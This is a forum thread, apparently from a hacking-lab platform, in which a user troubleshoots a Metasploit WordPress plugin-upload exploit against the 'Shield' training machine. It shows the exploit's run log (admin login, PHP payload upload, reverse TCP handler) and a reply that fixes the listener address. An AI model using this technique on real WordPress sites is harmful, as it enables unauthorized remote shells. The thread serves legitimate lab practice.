Metasploit on Shield - starting point

edited February 13 in Machines

I tried to follow the walktrought but msf gives me an error(?): "exploit completed, but no session was created". I cant get the meterpreter shell. I've searched for a solution but I cant find anyone that works... resinstalled msf ecc. Maybe someone had the same issue?

here is the output on run

[] Started reverse TCP handler on ip:4444
[
] Authenticating with WordPress using admin:[email protected]!...
[+] Authenticated with WordPress
[] Preparing payload...
[
] Uploading payload...
[] Executing the payload at /wordpress/wp-content/plugins/JuAjfvxNwq/wSfnCTZMPf.php...
[!] This exploit may require manual cleanup of 'wSfnCTZMPf.php' on the target
[!] This exploit may require manual cleanup of 'JuAjfvxNwq.php' on the target
[!] This exploit may require manual cleanup of '../JuAjfvxNwq' on the target
[
] Exploit completed, but no session was created.

Comments

  • I figured it out and it was a stupid thing... the lhost setting of the reverse_tcp payload was wrong and i was listening on another network, not the vpn network. Msf was starting the TCP handler on the eth0 instead of starting it on the tun0 interface.

    so the solution was adding the following command to the exploit configuration in metasploit

       set lhost "ip"
    

    using your tun0 ip (vpn ip)

    I even canceled the ip in the output i posted in my question without noticing it hahaha

  • this helped me out! thanks

  • Oh,it is useful!Thank you.

    VodkaDL

Sign In to comment.